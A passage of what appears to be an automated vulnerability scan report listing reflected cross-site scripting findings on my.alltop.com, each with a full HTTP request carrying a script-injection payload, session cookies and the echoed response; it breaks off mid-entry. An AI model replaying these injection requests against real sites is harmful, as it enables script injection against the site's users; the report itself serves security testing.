<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3Cdf22f"><script>alert(1)</script>9bc35107a2a/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.79. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c66d"><script>alert(1)</script>df446e4c4a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E7c66d"><script>alert(1)</script>df446e4c4a6 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E7c66d"><script>alert(1)</script>df446e4c4a6" method="post" accept-charset="utf-8">
...[SNIP]...

1.80. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44494"><script>alert(1)</script>ac9d9ed721a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E?44494"><script>alert(1)</script>ac9d9ed721a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E?44494"><script>alert(1)</script>ac9d9ed721a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.81. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%22ns=%22netsparker(0x000178)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7af6"><script>alert(1)</script>827dcf1ba87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/de7af6"><script>alert(1)</script>827dcf1ba87/%22ns=%22netsparker(0x000178) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:21 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:22 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:22 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/de7af6"><script>alert(1)</script>827dcf1ba87/%22ns=%22netsparker(0x000178)" method="post" accept-charset="utf-8">
...[SNIP]...

1.82. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%22ns=%22netsparker(0x000178)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16cd"><script>alert(1)</script>930f3447f98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%22nsf16cd"><script>alert(1)</script>930f3447f98=%22netsparker(0x000178) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%22nsf16cd"><script>alert(1)</script>930f3447f98=%22netsparker(0x000178)" method="post" accept-charset="utf-8">
...[SNIP]...

1.83. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%22ns=%22netsparker(0x000178)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 731c2"><script>alert(1)</script>e0d03fcbfd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%22ns=%22netsparker(0x000178)?731c2"><script>alert(1)</script>e0d03fcbfd1=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%22ns=%22netsparker(0x000178)?731c2"><script>alert(1)</script>e0d03fcbfd1=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.84. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19541"><script>alert(1)</script>a0ee1d2bd98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d19541"><script>alert(1)</script>a0ee1d2bd98/%2522ns%253D%2522netsparker%25280x00017B%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d19541"><script>alert(1)</script>a0ee1d2bd98/%2522ns%253D%2522netsparker%25280x00017B%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.85. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a30b"><script>alert(1)</script>80c3e08212b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)6a30b"><script>alert(1)</script>80c3e08212b HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)6a30b"><script>alert(1)</script>80c3e08212b" method="post" accept-charset="utf-8">
...[SNIP]...

1.86. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ed1c"><script>alert(1)</script>8a0b1056dd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)?4ed1c"><script>alert(1)</script>8a0b1056dd5=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
